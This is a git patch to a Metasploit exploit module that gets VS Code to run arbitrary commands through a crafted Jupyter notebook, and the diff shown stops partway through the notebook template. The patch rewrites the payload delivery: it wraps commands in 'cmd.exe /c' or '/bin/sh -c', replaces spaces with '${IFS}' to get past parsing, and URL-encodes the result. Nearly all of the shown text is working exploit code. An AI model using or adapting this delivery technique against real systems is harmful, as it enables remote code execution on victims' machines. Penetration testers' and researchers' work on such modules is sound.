From 3da170a43c7f288fe9bc88fe325da488733acac3 Mon Sep 17 00:00:00 2001
From: h00die <michaeltcyr@gmail.com>
Date: Fri, 22 Mar 2024 17:04:06 -0400
Subject: [PATCH] smcintyre-r7 recommendation for better payload handling

---
 .../multi/misc/vscode_ipynb_remote_dev_exec.rb        | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb b/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
index 7911ae238e..d2bce191bb 100644
--- a/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
+++ b/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
@@ -95,9 +95,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, request)
     super unless request.uri.end_with? datastore['URIPATH']
 
-    pload = %({"config":{"executable":"#{payload.encoded.split(' ')[0]}","args":"#{payload.encoded.split(' ')[1..].join(' ')}"}})
+    if target['Platform'] == 'win'
+      config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }
+    else
+      config = { 'executable' => '/bin/sh', 'args' => "-c #{payload.raw.gsub(' ', '${IFS}')}" }
+    end
+
+    pload = JSON.dump({ 'config' => config })
+
     puts pload
-    pload = CGI.escape(pload).gsub('+', '%20')
+    pload = CGI.escape(pload).gsub('+', '%20') # XXX not suure if this is needed or not
 
     ipynb = %|{
 "cells": [